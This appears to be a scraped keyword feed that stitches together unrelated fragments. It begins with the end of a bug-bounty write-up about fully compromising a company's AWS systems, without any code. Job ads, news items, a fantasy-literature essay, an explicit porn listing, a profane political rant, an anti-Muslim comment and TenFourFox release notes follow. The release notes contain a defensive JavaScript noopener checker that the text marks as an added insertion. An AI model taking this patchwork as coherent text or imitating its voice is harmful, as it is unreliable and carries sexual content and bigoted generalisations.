    Left: listing of the EC2 instances configured by ArticMonkey. Probably a big part, or the whole, of their system.

    Right: the company owns 20 buckets, containing highly sensitive data from customers, static files for the web application and, according to the names of the buckets, probably logs/backups of their servers.

    Impact: lethal.

    Timeline

    06/09/2018 12h00 - beginning of the hunt

    07/09/2018 00h30 - report

    07/09/2018 19h30 - fix and reward

    Thanks to ArticMonkey for being so fast to fix and reward, and for agreeing to this article :)

    Conclusion

    I learnt a lot because of this bug:

    ReactJS, fetch(), AWS metadata. RTFM! The official documentation is always a great source of (useful) information. At each step new problems appeared. I had to search everywhere, try many different things, I had to push my limits to not give up. I now know that I can fully compromise a system by myself starting from 0, which is a great personal achievement and satisfaction :)

    When someone tells you that you’ll never be able to do something, don’t waste your time bargaining with these people, simply prove them wrong by doing it.


          Pentagon slow to protect weapon systems from cyber threats: U.S. agency
    The Pentagon has been slow to protect major weapon systems from cyber attacks and routinely found critical vulnerabilities that hackers could potentially exploit in those systems, a federal government report said on Tuesday.

          Machinist - Groupe SFP ressources humaines - Fermont, QC
    *ArcelorMittal Exploitation minière Canada s.e.n.c.* is the world’s number one steel and mining company and has more than 220,000 employees... $39.76 - $45.10 an hour
    From Indeed - Wed, 01 Aug 2018 19:33:47 GMT - View all Fermont, QC jobs
          BCEJP00017403 - Senior Security Analyst - Modis Canada - Montréal, QC
    Senior Security Analyst. Responsible for planning, designing, building and operating the networks of a multi-billion-dollar company...
    From Modis Canada - Fri, 05 Oct 2018 21:37:09 GMT - View all Montréal, QC jobs
          No more clandos… The prefect bans them

    It’s over for all users of clandos… The prefect of Dakar has just launched a hunt for vehicles without a transport operating licence, commonly called « clandos ». And the prefect threatens to impound them… So all users of these cheaper cars will have to look for the price of the bu […]
          Democrats Can Exploit the ‘McCain Divide’ in the GOP
    This piece is only available to Political Wire members. Your support makes this site possible. Join today for the complete Political Wire experience and get exclusive analysis, new features and no advertising. Sign in to your account or join today! Join for just $5 a month or $50 a year.
          Part-Time Professor - Network Systems and Components - Durham College - Oshawa, ON
    This is a necessary foundation for further investigations and the testing of remedial actions covered in the Access Controls, Hacking & Exploits and Network...
    From Durham College - Wed, 26 Sep 2018 07:27:59 GMT - View all Oshawa, ON jobs
          Comment on Iran’s Ayatollah exploits Jewish Olympian Aly Raisman for pro-hijab propaganda by Hideous Islamic Hijab
    Sexual assault has nothing to do with a woman's clothing. Again the Jew-hating Ayatollah Khamenei blames the woman, in this case a proud Jew. A man who sexually assaults a woman is not normal. Usually he is a substance abuser and sociopath. Muslim men murder, assault, honour kill and rape Muslim women wearing the Islamic hijab. Rape is about power and control and Muslim men control women by imposing the hideous hijab but that does not stop them from raping. Always putting the blame on the woman.
          DeVos Ally, New Leader of For-Profit K12 Inc. Promises to Clean Up Its Shoddy Record | Diane Ravitch's blog

    DeVos Ally, New Leader of For-Profit K12 Inc. Promises to Clean Up Its Shoddy Record


    Over the years, it has become obvious that virtual charter schools are a sham. ECOT in Ohio was a spectacular failure, which made millions for its for-profit owner (“the ECOT man”) but cost taxpayers over a billion dollars that should have gone to public schools. The founder of the Pennsylvania Cyber Charter School is now in jail, convicted of stealing millions of dollars, but convicted only of tax evasion, not embezzlement. June Brown, who operated K12 Inc. schools in Pennsylvania, avoided conviction because of her advanced age (she kept the money).

    K12 Inc. is perhaps the biggest of the shams because it has the most students. It is listed on the New York Stock Exchange. It makes handsome profits, but its students drop out at a high rate and get low test scores on state tests. The NCAA stripped 24 of the virtual K12 Inc. schools of accreditation a few years back after it discovered that students were often taking the K12 Inc. tests without bothering to first sit for instruction. NCAA officials saw tests that included “true-false” questions, and observed that students could take the test again if they failed. Any number of K12 Inc. virtual schools have been engaged in fraudulent practices that led to fines or even jail sentences for their operators.

    K12 Inc. has been repeatedly criticized for the poor performance of its students. They start behind and they don’t catch up. See here. See here. See here. See here.
    K12 Inc. originated with Ron Packard, who was paid $5 million a year to Continue reading: DeVos Ally, New Leader of For-Profit K12 Inc. Promises to Clean Up Its Shoddy Record | Diane Ravitch's blog



          Wireless Sales Associate - Sept Iles - OSL Retail Services Inc - Sept-Îles, QC
    Then OSL is for you. Walmart Canada has partnered with OSL to operate its 350 wireless stores across Canada and we are in the midst of...
    From OSL Retail Services Inc - Mon, 24 Sep 2018 13:21:37 GMT - View all Sept-Îles, QC jobs
          Wireless Sales Associate - Alma - OSL Retail Services Inc - Alma, QC
    Then OSL is for you. Walmart Canada has partnered with OSL to operate its 350 wireless stores across Canada and we are in the midst of...
    From OSL Retail Services Inc - Fri, 06 Jul 2018 01:21:59 GMT - View all Alma, QC jobs
          Wireless Sales Associate - Val D'Or - OSL Retail Services Inc - Val-d'Or, QC
    Then OSL is for you. Walmart Canada has partnered with OSL to operate its 350 wireless stores across Canada and we are in the midst of...
    From OSL Retail Services Inc - Thu, 20 Sep 2018 01:20:16 GMT - View all Val-d'Or, QC jobs
          Wireless Store Manager - OSL Retail Services Inc - Québec City, QC
    Then OSL is for you. At OSL, we know how to reward our employees. Walmart Canada has partnered with OSL to operate its 350 wireless...
    From OSL Retail Services Inc - Mon, 17 Sep 2018 19:20:40 GMT - View all Québec City, QC jobs
          Wireless Sales Associate - Levis - OSL Retail Services Inc - Lévis, QC
    Then OSL is for you. Walmart Canada has partnered with OSL to operate its 350 wireless stores across Canada and we are in the midst of...
    From OSL Retail Services Inc - Thu, 04 Oct 2018 19:19:16 GMT - View all Lévis, QC jobs
          Wireless Sales Associate - Victoriaville - OSL Retail Services Inc - Victoriaville, QC
    Then OSL is for you. Walmart Canada has partnered with OSL to operate its 350 wireless stores across Canada and we are in the midst of...
    From OSL Retail Services Inc - Wed, 03 Oct 2018 13:20:36 GMT - View all Victoriaville, QC jobs
          Wireless Sales Associate - Ste-Agathe des Monts - OSL Retail Services Inc - Sainte-Agathe-des-Monts, QC
    Then OSL is for you. Walmart Canada has partnered with OSL to operate its 350 wireless stores across Canada and we are in the midst of...
    From OSL Retail Services Inc - Wed, 22 Aug 2018 19:20:44 GMT - View all Sainte-Agathe-des-Monts, QC jobs
          Wireless Store Manager - Joliette - OSL Retail Services Inc - Joliette, QC
    Then OSL is for you. At OSL, we know how to reward our employees. Walmart Canada has partnered with OSL to operate its 350 wireless...
    From OSL Retail Services Inc - Fri, 21 Sep 2018 19:20:02 GMT - View all Joliette, QC jobs
          Wireless Sales Associate - Joliette - OSL Retail Services Inc - Joliette, QC
    Then OSL is for you. Walmart Canada has partnered with OSL to operate its 350 wireless stores across Canada and we are in the midst of...
    From OSL Retail Services Inc - Fri, 21 Sep 2018 19:19:46 GMT - View all Joliette, QC jobs
          Wireless Sales Associate - Drummondville - OSL Retail Services Inc - Drummondville, QC
    Then OSL is for you. Walmart Canada has partnered with OSL to operate its 350 wireless stores across Canada and we are in the midst of...
    From OSL Retail Services Inc - Thu, 12 Jul 2018 01:18:36 GMT - View all Drummondville, QC jobs
          10/10/2018: CANADA: Notley, Kenney clash over Odin photos

    EDMONTON • Alberta Premier Rachel Notley says Opposition Leader Jason Kenney must stop “dog-whistle” politics that allow hateful extremists to believe they have a home in his United Conservative Party. But Kenney is accusing Notley of exploiting a...
          Google appeals the record 4.3 billion euro fine over Android
    (zonebourse.com) Brussels (awp/afp) - Google on Tuesday appealed the record fine of 4.34 billion euros imposed on it in July by the EU over the dominant position of its Android smartphone operating system, the American group announced. "We have appealed against the decision of the...
    http://www.zonebourse.com/APPLE-4849/actualite/Google-fait-appel-de-l-amende-record-de-4-3-milliards-d-euros-pour-Android-27394031/?utm_medium=RSS&utm_content=20181009
          10/10/2018: NEWS: Notley criticizes Kenney over photos of UCP members with Soldiers of Odin

    Alberta Premier Rachel Notley says Opposition Leader Jason Kenney must stop “dog-whistle” politics that allow hateful extremists to believe they have a home in his United Conservative Party (UCP). But Mr. Kenney is accusing Ms. Notley of exploiting a...
          World War II and Epic Fantasy
    Epic fantasy is, arguably, a form of storytelling highly influenced by the Second World War. World War II remains unusual in military history for being a conflict which can clearly be divided between the “bad guys” (Nazi Germany and Imperial Japan) and the “good guys” (the plucky Brits, the brave French Resistance and the heroic-if-a-bit-tardy United States of America) with a minimum of moral uncertainty. Popular narratives of the Second World War show the heroic, democracy-loving Brits and Yanks storming the beaches of Normandy to save Europe from the diabolical and evil rule of the brutal Third Reich.

    Christopher Lee as Saruman in Peter Jackson's Lord of the Rings movie trilogy. Lee fought in the British special forces in WWII, in operations that he refused to discuss even decades afterwards.

    This is of course monstrously simplistic, and ignores the morally murkier elements of the conflict, such as the Allied mass bombing campaign that was designed to slaughter as many German civilians as possible, and of course the involvement of the Soviet Union in the war. The USSR committed many atrocities of its own (including being complicit in Germany’s invasion of Poland which started the war in the first place) and was willing to accept staggering military and civilian losses to finally defeat the Germans and capture Berlin (a fact glossed over in western accounts of the conflict, which tend to suggest that the US and UK were the primary architects of Hitler’s downfall rather than relative bystanders). Still, the sometimes almost cartoonishly evil nature of the Nazi regime (“Are we the bad guys? If not, why do our uniforms have skulls on them?”) allows it to be presented as an irredeemable foe who must be destroyed at all costs with a minimum of moral qualms, very useful for propaganda, morale and rousing novels, films and video games.

    Epic fantasy written in the post-war era feels like it is influenced by this conflict. People writing fantasy in this period either fought in the war directly, were children during it or were born in the aftermath of the conflict and grew up with stories of it from their parents and grandparents.

    The fantasy saga sometimes said to have been most influenced by the war is The Lord of the Rings, although J.R.R. Tolkien was scornful of this. He started writing the book in late 1937, two years before the conflict even began, and the story and themes of the book developed out of The Hobbit, mostly written in 1930-32 or thereabouts. The titular One Ring itself is sometimes compared to a nuclear bomb (in its ability to end the War of the Ring in a single stroke rather than actual destructive power) and much is made of the Scouring of the Shire and its similarity to the military occupation of a formerly peaceful territory. However, the Ring was created for The Hobbit and its powers established long before the outbreak of the conflict. Tolkien himself was furious with the idea of the book being an allegory (noting he detested allegory wherever it was found), but did acknowledge the idea of “applicability,” and the disturbing feeling that real events were conforming (somewhat) to those in the book rather than vice versa. Tolkien did acknowledge a much greater influence on the book by his own experiences in World War I, particularly the several months he spent on the Western Front during the Battle of the Somme. The Frodo-Sam relationship is reminiscent of that between a gentleman soldier and his batman, and the Dead Marshes with their hordes of corpses (and semi-undead) lying face-up in the flooded marshlands being an image that stuck with Tolkien from the aftermath of bloody engagements.

    Skipping ahead a few generations, Margaret Weis and Tracy Hickman’s Dragonlance Chronicles feels like a revamp of the Second World War. The forces of evil gain a series of military advantages from the return of the dark goddess Takhisis and the ability to control evil dragons in battle. This allows them to overrun half the continent of Ansalon and push the remaining nations and our heroes to the brink of defeat. However, our heroes gain the favour of the god Paladine, the allegiance of the good dragons and then the ability to use the fabled dragonlances in battle. This turns the tide and routs the enemy. This can be seen as a reflection of the military technology in WWII: the Germans’ early innovation and technical ingenuity gave them a keen early edge that allowed them to defeat everyone they faced in battle, but later in the conflict the Allies first matched and then exceeded their technological advantage, which the Germans could not sustain and ultimately lost.

    Many epic fantasies feature narratives not dissimilar to this. The Wheel of Time shows a growing threat from a powerful opponent who is allowed to go unchecked because the nations that should be unifying against them can’t stop their squabbles with one another, even when the threat becomes blatant. This is an echo of the way Hitler expertly exploited inter-war rivalries between nations such as Russia and Poland to stop opponents joining forces against him (and, indeed, struck an unlikely alliance himself with Russia which prevented them from joining France and Britain in the war). The decision of the forces of “Light” in the books to join forces with the morally highly dubious Seanchan to fight the Dark One can be seen as a reflection of the reluctance with which nations like Britain (whose leader, Churchill, held a deep and abiding hatred of Communism) allied with Russia to fight the greater threat, and the repeated warning that this alliance could sow the seeds of a greater conflict later on (as it very nearly did, with the Cold War almost going nuclear-hot on several occasions, and various visions in The Wheel of Time showing a future where the Seanchan and the other nations resume their conflict).

    George R.R. Martin’s A Song of Ice and Fire is rather different, however. The conflict between the Great Houses is of course most strongly influenced by the Wars of the Roses, but there is also a strong influence from World War I: the Houses go to war against one another in a manner reflecting their inter-war alliances and fuelled by grievances (just and unjust) extending back generations, with Jon Arryn’s death and then Tyrion Lannister’s arrest setting in motion a series of falling dominoes leading to conflict as much as Franz Ferdinand’s assassination in August 1914.

    The most notable fantasy novel series directly based on World War II is Harry Turtledove’s Darkness series, a six-volume series set on a continent resembling Eurasia which is riven by war. Technological developments are replaced by discoveries in the field of sorcery but every nation has its real-world analogue (albeit often inverted; the war in the desert in Africa is replaced by a war on a southern polar continent) and the conflict unfolds in a very similar manner. Turtledove of course likes to revisit WWII in his alternate history fiction, with his splendidly readable, pulp Worldwar series being set during a WWII interrupted by the arrival of an alien invasion fleet, and his darker Southern Victory series in which the Confederacy survives the Civil War as an independent state and becomes embroiled in further conflicts leading to the establishing of a North American theatre in WWII (which, due to a German victory in WWI and no rising of the Nazi Party, unfolds very differently).


    A recent fantasy which directly echoes the war is the video game series Valkyria Chronicles. Set on the continent of Europa, the story charts the outbreak of war between the East Europan Imperial Alliance (a blending of Nazi Germany in ideology and Soviet Russia in size and manpower) and the Atlantic Federation (a mixture of western European nations such as Britain and France, and NATO of the Cold War period, albeit with an American analogue which is very reluctant to get involved in the fight). The war opens with the Empire invading the Federation and the small neutral nation of Gallia (based loosely on the Netherlands and Belgium), the latter both to seize its deposits of ragnite (a valuable ore which powers advanced technology) and to allow it to invade the Federation on a second front. Unlike the real war, where the Low Countries were overrun quickly, in the game the much smaller Gallian army is able to rally around the nation’s complex geography (particularly its rivers and canals) and prevent the numerically superior Imperial army from seizing the country. The Empire’s insistence on deploying increasingly insane and impractical tanks on the battlefield and its constant hunt for superweapons is an echo of Hitler’s insistence on deploying increasingly unreliable new technology during WWII rather than refining existing designs, not to mention his increasingly desperate search for “doomsday weapons” that could end the war quickly. Even the Mamota, an insane “land battleship” which the Empire uses at the end of the game, is based on a real idea, the Landkreuzer P.1000 Ratte, a 1,000-ton tank Hitler heartily endorsed but whose development was cancelled by Albert Speer on the reasonable grounds it was ridiculous.

    Valkyria Chronicles (2008) is unusual in combining both direct WWII elements – guns, artillery, grenades, tanks, propaganda and pogroms against a scapegoated minority (the Darcsens replacing the Jews) – and traditional fantasy tropes. There is an ancient magical race, the Valkyrur, whose power lingers into the modern age and at key moments both protagonists and antagonists gain access to their power. There are magical items and hopeless struggles by a plucky band of up-against-the-odds heroes against monstrous enemies (although some of them are shown to have a code of individual honour at odds with the atrocities their forces commit). Surprisingly cynically, the Federation, which becomes prominent in Valkyria Chronicles 4 (2018), is shown to sometimes be brutal and cold as well, willing to sacrifice vast numbers of civilian lives and infringe the borders of sovereign nations in order to get an upper hand against the Empire and is secretly developing a weapon of mass destruction behind the scenes. The oddest element of the Valkyria universe, given how closely it parallels WWII, is the near-total absence of aircraft from the conflict, with the few aircraft mentioned or appearing being WWI-style biplanes.

    Of course, the straightforward (if not exactly accurate) good vs. evil nature of WWII gave rise afterwards to much more morally murky conflicts where the notions of good, evil, justice and injustice became far more fluid: Suez, Vietnam, Bosnia, the Iraq War and clashes of religious fundamentalists. This can be seen in the type of fantasy fiction that has followed: the Black Company (by Vietnam vet Glen Cook) and Steven Erikson’s The Malazan Book of the Fallen (inspired by a lot of war fiction, and indeed The Black Company) are much less clear-cut tales where good and evil are less of an issue. Joe Abercrombie explores some of the same issues of morally flexible realpolitik in his First Law world. Scott Bakker’s Second Apocalypse series (including the Prince of Nothing and Aspect-Emperor sub-series) delves deep into religious fundamentalism and fanaticism. Mark Lawrence’s Broken Empire series presents the world with a monstrously damaged human being who commits atrocities but who, ultimately, may end up saving the world. The moral relativism of post-WWII conflicts has been well matched and explored by fantasy fiction, perhaps too much for some, as we’ve also seen a re-emergence of throwback fantasy, more concerned with more straightforward tales of good vs. evil (such as Michael Sullivan’s Riyria series and Brandon Sanderson’s Cosmere works).

    WWII will remain a rich source of inspiration for fantasy fiction, although it is refreshing (if perhaps a tad depressing) to see other, less clear-cut conflicts being mined for different kinds of stories.

    Thank you for reading The Wertzone. To help me provide better content, please consider contributing to my Patreon page and other funding methods, which will also get you exclusive content weeks before it goes live on my blogs. The History of The Wheel of Time, SF&F Questions and The Cities of Fantasy series are debuting on my Patreon feed and you can read them there one month before being published on the Wertzone.

          Grand Exploits Travels opens office in Lagos

    Nairametrics

    Grand Exploits Limited has opened for business in Lagos. The formal opening of the office located at Pees Galleria Shopping Mall.

    The post Grand Exploits Travels opens office in Lagos appeared first on Nairametrics.


          Physics Colloquium: Quantum Inspired Photonics
    Wednesday, Oct 10
    (4 p.m. - 5 p.m.)

    Dr. Liang Feng (University of Pennsylvania)

    Quantum mechanics and photonics share a mathematical equivalence. By carefully exploiting the interplay between optical index, gain and loss in the complex dielectric permittivity plane, optics has become an ideal platform to explore some exotic quantum concepts, such as topological physics and parity-time (PT) symmetry. Instead of counteracting optical losses at micro and nano scales in integrated photonics, we started from the opposite viewpoint and developed a new paradigm of positively and strategically manipulating optical losses through the quantum-inspired photonics concept, enriching fundamental optical physics and realizing novel photonic synthetic matter with unique optical functionalities. In this seminar, I will present our recent efforts on engineering the complex optical potentials at an exceptional point (i.e. the PT symmetry transition point). Based on the exceptional point-induced unidirectionality, we harness optical losses to enable unique microlaser functionalities, in particular an orbital angular momentum (OAM) microlaser that structures and twists the lasing radiation at the microscale, which is expected to address the growing demand for information capacity. Additionally, I will discuss non-Hermitian topological photonics, where optical non-Hermiticity and topological physics are coupled.


          Naughty Alysha's My Whore Life vol 11

    Studio: Sticky Video
    Cast: Naughty Alysha
    Genres: Big Boobs, Big Butt, Blondes, Gonzo, Mature, Naturally Busty, Star showcase
    Video language: English

    Reality Porn at its best!!! Watch the real life sexploits of superwhore Naughty Alysha in this hardcore fuckumentary. Tons of sucking & fucking round out her daily activities!!!

    Format: mp4
    Duration: 1:28:56
    Video: 720x404, AVC (H.264), 1640kbps
    Audio: 158kbps




    File size: 1.1 GB






          Postmaster – Premises provided by the Postmaster - (group category) - Canada Post - Beaver Creek, YT
    Operate the post office with appropriate diligence and efficiency. Keep the post office clean and presentable, and maintain cleanliness in... $16.71 an hour
    From Canada Post - Tue, 19 Jun 2018 00:37:23 GMT - View all Beaver Creek, YT jobs
          Director of Operations - administrative services - Boys and Girls Club of Yukon - Whitehorse, YT
    Languages: English. Education: Bachelor’s degree. Experience: 5 years or more. Specific skills: Hire, train or delegate the training of staff; Carry out... $37,000 - $42,250 a year
    From Guichet emplois - Wed, 19 Sep 2018 04:47:53 GMT - View all Whitehorse, YT jobs
          IIS attacks surge from 2,000 to 1.7 million over last quarter

    IIS, Drupal, and Oracle WebLogic web technologies experienced increased attacks in Q2 2018. According to a new threat report from eSentire, IIS attacks showed a massive increase, from 2,000 to 1.7 million, since last quarter.

    [Figure: Exploit campaigns observed April 1 – July 1, 2018]

    Analysis of the attacks revealed that both IIS and WebLogic exploits maintained a consistent number of attacks (about 200) per IP across organizations, with those attacks originating from servers hosting Apache, …

    The post IIS attacks surge from 2,000 to 1.7 million over last quarter appeared first on Help Net Security.


          More Easy Answers

    So, yeah. Easy answers. Achievement without effort. This desire for maximum output with minimum input is hard-wired into us. Being able to figure out the simplest way to achieve one's goals is a survival mechanism. But sometimes evolutionary traits can backfire. Especially when one lives within a self-reinforcing protective bubble of information.

    The climate change deniers, the anti-vaxxers, right-wing troglodytes, Hillary-bots, partisans of all stripes, hive off into their little communities of self-adulation and self-praise and become so enamored of the endless stream of mental rewards they dole out to one another that they become disconnected from reality.

    And when the deluded praise supplants the actual achievements, they don't even notice how insane they're acting. Personally, I'm of the opinion that Justin Trudeau is probably not a bad guy. I'm sure he's somewhat arrogant due to the prestige of his father's name and due to his own astonishingly good looks. Combine this with what appears to be a definite mental shallowness and I'm also sure that he's not an individual I'd ordinarily seek out for his company. (He'll live, I'm sure.) But overall, he's probably a fairly agreeable chap.

    So why is he pushing these bitumen pipelines and running roughshod over promises (very important promises) to the First Nations? Why is he continuing with stephen harper's Orwellian surveillance legislation? Why is he so prepared to be a neo-liberal thug in so many areas (albeit while wiping a tear from his liberal eye)?

    Probably because he has immersed himself in the bubble of delusion that is the Liberal Party of Canada.


    Think about it. He spends all day either very busy reading reports made by like-minded researchers, or speaking with like-minded partisans. And much of his workplace discussion focuses on convincing a conservative, corporatist media on the soundness of Liberal approaches to ideas and policies. He has neither the time, nor the inclination, nor the incentive to genuinely consider and interact with contrary sources of opinion.

    And, when he suffers cognitive dissonance from encountering new facts that are unexplainable by his Liberal worldview, he simply stops thinking about them. And, of course, this process works for previously accepted knowledge that no longer fits with his present Liberal world-view bubble. This explains his ability to have had sincere, fruitful discussions with David Suzuki about the dangers of Climate Change and what is necessary to counteract these grave dangers, and then, following his attaining power, to simply stop talking to Suzuki. Upon gaining power, Trudeau and the Liberals immediately embraced "pragmatism," or, balancing the "needs" of the psychopaths in Calgary and Toronto's Bay Street with those of the environment and the human race.


    This has to be done of course because there's a competing political party that's vying for power: The morons and troglodytes and sleazy con-artists and religious freaks and pathetic closet-cases who comprise the Conservative Party of Canada. These shit-heads deny the reality of climate change and make no pretense of serving anyone other than the capitalist elite. (That's not exactly true. They DO gratify their voting base with policies of discrimination and racism and other forms of bigotry towards scapegoats and the weak. The low-functioning level of their voting base is such as to be easily requited with the abuse of "the other" even as their own lives continue to deteriorate as a result of the main thrust of their own party's policies.)

    So it is with Trudeau's false promises to the First Nations. Whatever he wants to think, Trudeau remains part of an imperialist-colonialist project of genocide against the First Nations. Their precedence on these lands, and their existing claims on rights and resources are a hindrance to the capitalist project of exploitation and so they are to be eliminated. Canada did not have the power to simply massacre them all at once and so has settled for long-term "low-intensity-conflict" wherein we destroy their languages and cultures and deprive them of services and resources (while forbidding them from accessing their own resources) and, when necessary, we break solemn promises to them while continuing to deny them the resources they surrendered and the actions they had taken, in return for those promises.

    And Trudeau justifies all of this behaviour with standard Liberal platitudes, and he is able to do this because he exists within a bubble of self-reinforcing Liberal platitudes. That's how he and his witless Environment Minister can pose in super-hero costumes as "Climate Superheroes" while they continue to suck dirty tar out of the ground to give to the Chinese to burn. It's how Trudeau can continue to give heartfelt apologies to past crimes against the First Nations while continuing to inflict new ones upon them and pretending that the vast majority of the First Nations do not now hate his guts and despise the sound of his voice.


    Because he's surrounded himself with a bubble of stupid Liberals and stupid Liberal platitudes. All day, every day, he's immersed in a soothing bath of "We make sure that every Canadian has a chance to reach their fullest potential" and "Politics is the art of the possible and we are the ultimate in what is possible" and "We represent ALL Canadians, rich and poor, all creeds and colours."

    How to conclude this little spiel? I don't know. Break that bubble. But how? I've sent my own Liberal MP some e-mails but I can't even be sure that he reads them.



              Comments on “Doing crazy things, not dying”: mountaineering according to Reinhold Messner, by albert
    About Cesare. A "recent" addition: Bronze Medal for Civil Valour and the Order of the Thistle for his commitment to rescuing or recovering other mountaineers. Yet people still insist on those pitons, part of which he himself knowingly removed. The first one not to care about digging all that up again is he himself... a sign that by now his maturity goes BEYOND... into another perspective. Others who have become Wise reconsider and rework things too, for example Maurizio Zanolla. They offer ideas and reflections that go beyond the exploits; the human, introspective side of the stories emerges.
              Technical Support Agent, Télébec - Bell - Val-d'Or, QC
    Expertise in the Windows 7, 8 and 10, Vista, MAC and Outlook operating systems. Request code:....
    From Bell Canada - Thu, 13 Sep 2018 22:39:21 GMT - View all Val-d'Or, QC jobs
              Support Analyst - Analyste au support - Exela Technologies - Montréal, QC
    Microsoft operating systems, including XP, Vista, 2003 and 2008. Microsoft Windows Server and Workstation including XP, Vista, 7, 2003 and 2008...
    From Indeed - Fri, 28 Sep 2018 20:27:37 GMT - View all Montréal, QC jobs
              Help Desk Technician - French / English / Spanish / Portuguese - CGI - Montréal, QC
    Good knowledge of the Windows NT, XP, Vista, 7 operating systems. Job description:....
    From CGI - Fri, 13 Jul 2018 15:12:47 GMT - View all Montréal, QC jobs
              VERT Threat Alert: October 2018 Patch Tuesday Analysis

    Today’s VERT Alert addresses Microsoft’s October 2018 Security Updates. VERT is actively working on coverage for these vulnerabilities and expects to ship ASPL-800 on Wednesday, October 10th. In-The-Wild & Disclosed CVEs: CVE-2018-8453. This vulnerability, a privilege escalation in Win32k’s handling of objects in memory, has been exploited in the wild. According to ZDNet, the exploit […]

    The post VERT Threat Alert: October 2018 Patch Tuesday Analysis appeared first on The State of Security.


              Time zone: How to set the date and time on Kodi?

    If you run Kodi on an Android machine, be aware that Kodi displays its own date and time, which can differ from Android's. And depending on the device and operating system you use, one matters more than the other. The simplest answer is to make sure both are set correctly. How to set […]

    The article "Time zone: How to set the date and time on Kodi?" first appeared on Actualité High-Tech, applications Android gratuites, extensions Media center et produits intelligents.


              Cameron Kaiser: TenFourFox FPR10b1 available
    TenFourFox Feature Parity 10 beta 1 is now available (downloads, hashes, release notes). This version is mostly about expanded functionality, adding several new DOM and JavaScript ES6 features, and security changes to match current versions of Firefox. Not everything I wanted to get done for this release got done, particularly on the JavaScript side (only one of the ES6 well-known symbols updates was finished in time), but with Firefox 63 due on the 22nd we'll need this period for sufficient beta testing, so here it is.

    The security changes include giving document-level (i.e., docshell) data: URIs unique origins to reduce cross-site scripting attack surface (for more info, see this Mozilla blog post from Fx57). This middle ground should reduce issues with the older codebase and add-on compatibility problems, but it is possible some historical add-ons may be affected by this and some sites may behave differently. However, many sites now assume this protection, so it is important that we do the same. If you believe a site is behaving differently because of this, toggle the setting security.data_uri.unique_opaque_origin to false and restart the browser. If the behaviour changes, then this was the cause and you should report it in the comments. This covers most of the known exploits of the old Firefox behaviour and I'll be looking at possibly locking this down further in future releases.

    The other notable security change is support for noopener, using the soon-to-be-current implementation in Firefox 63. This feature prevents a new window (presumably opened unwittingly) onto a malicious page from letting that page manipulate the page that opened it, and many sites already support it.
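    The site-side half of the noopener change above, as an added example that is not TenFourFox or Mozilla code: it audits markup for links that open a new window without rel="noopener" (the case where the opened page receives a window.opener reference) and rewrites them. The sample HTML is constructed for the demonstration and the regex-based attribute parser is a simplification, not a full HTML parser.

```javascript
// Constructed sample markup, not taken from any real site.
const SAMPLE_HTML = `
<a href="https://example.com/docs" target="_blank">Docs</a>
<a href="https://example.com/forum" target="_blank" rel="noopener noreferrer">Forum</a>
<a href="/local">Same tab</a>
<a href='https://example.com/x' rel="nofollow" target='_blank'>Quoted</a>
`;

// Matches one <a ...> start tag and captures its attribute text.
const ANCHOR_RE = /<a\b([^>]*)>/gi;
// Matches name="value", name='value' or name=value inside a tag (simplified).
const ATTR_RE = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;

// Parse the attributes of one anchor tag into a map of lower-case name -> value.
function parseAttrs(attrText) {
  const attrs = {};
  for (const m of attrText.matchAll(ATTR_RE)) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? '';
  }
  return attrs;
}

// rel is a space-separated token list, so the check is token-based:
// "noopener" must be a whole token, not a substring of another one.
function hasRelToken(rel, token) {
  return (rel || '').toLowerCase().split(/\s+/).includes(token);
}

// Return the href of every link that opens a new browsing context while
// still handing it a window.opener reference (target="_blank", no noopener).
function findUnsafeBlankLinks(html) {
  const unsafe = [];
  for (const m of html.matchAll(ANCHOR_RE)) {
    const attrs = parseAttrs(m[1]);
    const opensNewWindow = (attrs.target || '').toLowerCase() === '_blank';
    if (opensNewWindow && !hasRelToken(attrs.rel, 'noopener')) {
      unsafe.push(attrs.href || '');
    }
  }
  return unsafe;
}

// Mitigation: append "noopener" to rel on every target="_blank" anchor that
// lacks it. Anchors that already carry the token are returned unchanged, so
// running this twice is a no-op.
function addNoopener(html) {
  return html.replace(ANCHOR_RE, (tag, attrText) => {
    const attrs = parseAttrs(attrText);
    const opensNewWindow = (attrs.target || '').toLowerCase() === '_blank';
    if (!opensNewWindow || hasRelToken(attrs.rel, 'noopener')) {
      return tag;
    }
    if ('rel' in attrs) {
      // Extend the existing rel token list in place, keeping its quote style.
      return tag.replace(/\brel\s*=\s*(["'])([^"']*)\1/i,
        (_, q, v) => `rel=${q}${v} noopener${q}`);
    }
    // No rel attribute at all: add one.
    return `<a${attrText} rel="noopener">`;
  });
}

// Stand-alone run: report the offending links, then show the hardened markup.
console.log('links missing noopener:', findUnsafeBlankLinks(SAMPLE_HTML));
console.log(addNoopener(SAMPLE_HTML));
```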

    This release also now prefs MSE (and VP9) to on by default, since YouTube seems to require it. We do have AltiVec acceleration for VP9 (compare with libvpx for Chromium on little-endian PowerPC), but VP9 is a heavier codec than VP8, and G4 and low-end G5 systems will not perform as well. You can still turn it off for sites that seem to do better with it disabled.

    There are two known broken major sites: the Facebook display glitch (worse on 10.5 than 10.4, for reasons as yet unexplained), and Citibank does not load account information. Facebook can be worked around by disabling Ion JavaScript acceleration, but I don't advise this because of the profound performance impact and I suspect it's actually just fixing a symptom because backing out multiple changes in JavaScript didn't seem to make any difference. As usual, if you can stand Facebook Basic, it really works a lot better on low-power systems like ours. Unfortunately, Citibank has no such workaround; changing various settings or even user agents doesn't make any difference. Citibank does not work in versions prior to Fx51, so the needful could be any combination of features newly landed in the timeframe up to that point. This is a yuuuge range to review and very slow going. I don't have a fix yet for either of these problems, nor an ETA, and I'm not likely to until I better understand what's wrong. Debugging Facebook in particular is typically an exercise in forcible hair removal because of their multiple dependencies and heavy minification, and their developer account has never replied to my queries to get non-minified sources.

    So, in the absence of a clear problem to repair, my plan for FPR11 is to try to get additional well-known symbols supported (which should be doable) and further expand our JavaScript ES6/ES7 support in general. Unfortunately for that last, I'm hitting the wall on two very intractable features because of their size which are starting to become important for continued compatibility. In general my preference is to implement new features in as compartmentalized a fashion as possible and preferably in a small number of commits that can be backed out without affecting too much else. These features, however, are enormous in scope and changes, and depend on many other smaller changes we either don't need, don't want or don't implement. They also tend to affect code outside of JavaScript such as the script loading environment and the runtime, which is problematic because we have very poor test coverage for those areas.

